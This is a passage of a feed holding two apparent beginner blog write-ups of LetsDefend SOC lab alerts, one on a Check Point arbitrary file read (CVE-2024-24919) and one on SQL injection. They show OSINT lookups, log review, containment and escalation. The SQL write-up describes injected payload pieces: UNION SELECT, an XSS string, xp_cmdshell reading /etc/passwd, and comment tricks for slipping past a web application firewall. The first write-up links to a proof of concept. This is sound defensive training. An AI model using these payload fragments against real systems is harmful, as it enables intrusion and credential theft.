&lt;p&gt;We start with examining the rule name &lt;code&gt;SOC287 - Arbitrary File Read on Checkpoint Security Gateway [CVE-2024-24919]&lt;/code&gt; and using OSINT to find out more information about the reporte CVE&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3a50alf0c9g81w5c8vqv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3a50alf0c9g81w5c8vqv.png" alt="nvd" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the screenshot of the NIST National Vulnerability database webpage about the above CVE&lt;br&gt;
link: &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2024-24919" rel="noopener noreferrer"&gt;https://nvd.nist.gov/vuln/detail/cve-2024-24919&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Description of the CVE:&lt;br&gt;
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available. The base score (severity) of it is 8.6 which is HIGH.&lt;/p&gt;

&lt;p&gt;From the description of the alert, we know it was "Allowed".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9eve4kczqygrfc6c3sh7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9eve4kczqygrfc6c3sh7.png" alt="collectdata" width="800" height="483"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our next step is to be collecting data to get a better understanding of the communication traffic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbmlog5a36d7jqpsqosvi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbmlog5a36d7jqpsqosvi.png" alt="intel" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Above is the screenshot of the Threat Intel tab on LetsDefend after we search for the source IP on it.&lt;/p&gt;

&lt;p&gt;This is what we get after we search for the IP and look at its reputation on VirusTotal:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faqgy3egr9due2gv8euoq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faqgy3egr9due2gv8euoq.png" alt="virustotal description" width="800" height="436"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The geolocation of the IP address is Hong Kong.&lt;br&gt;
We can now confirm the traffic is malicious and allowed, with low confidence since 2 out of 94 vendors found it malicious.&lt;/p&gt;

&lt;p&gt;Checking the IP's reputation on AbuseIPDB:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F10ypai291ntno214suin.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F10ypai291ntno214suin.png" alt="abuseipdb" width="800" height="424"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Below is what we find on Cisco Talos Intelligence:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpj3cgaktpv4965o5wkqp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpj3cgaktpv4965o5wkqp.png" alt="talosdescription" width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;link: &lt;a href="https://talosintelligence.com/reputation_center/lookup?search=203.160.68.12" rel="noopener noreferrer"&gt;https://talosintelligence.com/reputation_center/lookup?search=203.160.68.12&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next step for us is examining the HTTP traffic:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffgnndxgiz02sn1ehmrw0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffgnndxgiz02sn1ehmrw0.png" alt="httptraffic" width="800" height="538"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is a POC for the CVE exploit:&lt;br&gt;
&lt;code&gt;https://github.com/un9nplayer/CVE-2024-24919&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Let's dive in the logs now.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb9sf21nmnvku7kihj7dr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb9sf21nmnvku7kihj7dr.png" alt="log1" width="800" height="305"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looks like our attacker is attempting to navigate the file system of a server to access sensitive files like /etc/passwd and /etc/shadow on Unix-based systems, which contains user account information.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fraqpugdnvus9qbnf6y6y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fraqpugdnvus9qbnf6y6y.png" alt="lfi" width="800" height="334"&gt;&lt;/a&gt;&lt;br&gt;
Answer: LFI &amp;amp; RFI&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fln7n39rb816jwp92ubmv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fln7n39rb816jwp92ubmv.png" alt="plan" width="800" height="494"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we have to check if it is a planned test. &lt;br&gt;
After checking the Email Security tab and searching for the IP addresses and the hostname, we see no such mail regarding a notification of any planned test. We can conclude it is NOT a planned test.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw2cd2shpr9ywfix9czxe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw2cd2shpr9ywfix9czxe.png" alt="intetonetwork" width="800" height="376"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We saw the source IP is an external IP from Hong Kong.&lt;br&gt;
so the traffic is moving from Internet -&amp;gt; Company Network&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ficc0114t1i15ixelsu98.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ficc0114t1i15ixelsu98.png" alt="checkifsuccefful" width="800" height="655"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The attack was successful.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss47r5681f37lp7l6s09.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss47r5681f37lp7l6s09.png" alt="containment" width="800" height="548"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next step for us is to contain the host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomggexftrvswcgbqoafu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomggexftrvswcgbqoafu.png" alt="contained" width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Based on what we have uncovered during our investigation it would be wise for us to contain this server endpoint to prevent further damages.&lt;/p&gt;

&lt;p&gt;Add artifacts:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F18ur7mn5ufcrq2g0wlxl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F18ur7mn5ufcrq2g0wlxl.png" alt="artifacts" width="800" height="606"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2zx453mudta0r9fn2yiy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2zx453mudta0r9fn2yiy.png" alt="escalate" width="800" height="585"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here in this case we need Tier 2 escalation&lt;/p&gt;

&lt;p&gt;After adding Analyst's notes we finish the playbook and close the alert. &lt;/p&gt;

</description>
      <category>beginners</category>
      <category>education</category>
      <category>networksec</category>
    </item>
    <item>
      <title>LetsDefend SOC127 - SQL Injection Detected</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Fri, 24 Apr 2026 16:40:45 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc127-sql-injection-detected-ak</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc127-sql-injection-detected-ak</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8sicehewq6wt2xh14ejj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8sicehewq6wt2xh14ejj.png" alt="alert" width="800" height="306"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Above is the screenshot of the alert that we are going to investigate.&lt;/p&gt;

&lt;p&gt;We start with taking the ownership of the alert and then head to the investigation channel.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw82secbpe5b0fd9ac1of.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw82secbpe5b0fd9ac1of.png" alt="createcase" width="800" height="387"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we create the case for this alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0v1xki4120swz2wmrn9e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0v1xki4120swz2wmrn9e.png" alt="playbook" width="800" height="246"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next thing for us to do is starting the playbook.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgw6cyfnbo0ihnaym2nmt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgw6cyfnbo0ihnaym2nmt.png" alt="infopage" width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F139w2d6m5atbelyghwim.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F139w2d6m5atbelyghwim.png" alt="infopage2" width="800" height="523"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo90asyonn89ydf4w0zof.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo90asyonn89ydf4w0zof.png" alt="infopage3" width="800" height="532"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next thing I do is copy the url from the Request URL field and head to &lt;a href="https://gchq.github.io/CyberChef" rel="noopener noreferrer"&gt;CyberChef&lt;/a&gt; to &lt;code&gt;URL Decode&lt;/code&gt; it:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuk1afetshq4ru3plqnj9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuk1afetshq4ru3plqnj9.png" alt="cyberchef" width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It code looks like a malicious HTTP GET request trying to combine multiple attacks into one command:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;SQL Injection (Boolean + Union-Based)&lt;br&gt;
The attacker injects AND 1=1 to confirm the parameter is vulnerable, followed by a UNION ALL SELECT query to extract table_name from information_schema.tables. This aims to enumerate the database schema.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Reflected XSS Payload&lt;br&gt;
The string 'alert(&amp;amp;quot;XSS&amp;amp;quot;)' is injected into the UNION query. If unsanitized in the HTTP response, it will execute JavaScript in the victim's browser — used for session hijacking.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Command Injection via xp_cmdshell&lt;br&gt;
The attacker calls xp_cmdshell('cat ../../../etc/passwd'), a SQL Server stored procedure that runs OS-level commands. This attempts to read the system's password file, indicating privilege escalation or host compromise. (I looked up the use of the command)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Evasion Techniques Observed&lt;br&gt;
The payload uses --/**/ to break the comment without spaces (bypassing naive WAF rules) and a # at the end to terminate the query early. The 200 OK response suggests the server executed at least part of the request.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The HTTP GET request contains HTTP/1.1 200 865, here the number 200 means that the attack was successful.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsh9ncoiyy33y6h1zwand.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsh9ncoiyy33y6h1zwand.png" alt="httpattack" width="800" height="377"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can conclude that it is malicious&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7y0lo9m74mtawdsnc9nz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7y0lo9m74mtawdsnc9nz.png" alt="attackclass" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can answer this easily, it is the name of the alert: SQL Injection&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd9j5wq659ucuzf4d6j01.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd9j5wq659ucuzf4d6j01.png" alt="planned" width="800" height="491"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We go to the Email Security tab and check for the hostnames and IP addresses and check for any email that may be regarding a planned test, alas we find none.&lt;/p&gt;

&lt;p&gt;Next we go to VirusTotal and check the reputation of the Source IP address:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuh12jg2z4mruzn7isxz8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuh12jg2z4mruzn7isxz8.png" alt="reputation" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;9/94 vendors flag this IP as malicious, so we can say it is malicious, with low confidence.&lt;/p&gt;

&lt;p&gt;It was NOT a planned test.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffz4xil7r6v7vts5h4tf9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffz4xil7r6v7vts5h4tf9.png" alt="question" width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The destination IP is a part of the company network, and the source IP, as we know, is an external IP.&lt;br&gt;
Internet -&amp;gt; Company Network&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fihjndqgzwehzwb8k70kj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fihjndqgzwehzwb8k70kj.png" alt="succesfuol" width="800" height="637"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu8vjdw3p4rcl09ku652e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu8vjdw3p4rcl09ku652e.png" alt="suceful" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;YES, the attack was successful since we can see the code 200 in the HTTP Request&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6m2zjjsjy44yuw2yp2nc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6m2zjjsjy44yuw2yp2nc.png" alt="containment" width="800" height="536"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we move on to the containment phase.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hpnorokr1ab534srco1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hpnorokr1ab534srco1.png" alt="contained" width="800" height="426"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Artifacts added:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26wm7qvxtc34o6h3qx74.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26wm7qvxtc34o6h3qx74.png" alt="artifacts" width="800" height="466"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3nh4olwcxd62j2fgiztg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3nh4olwcxd62j2fgiztg.png" alt=" " width="800" height="594"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Do we need Tier 2 escalation? Answer: Yes, since we know the attack was successful.&lt;/p&gt;

&lt;p&gt;After adding Analyst's notes, we close the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiz6zc5rwcvl6ffc82zde.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiz6zc5rwcvl6ffc82zde.png" alt="closedplaybook" width="800" height="312"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we close the alert:&lt;/p&gt;

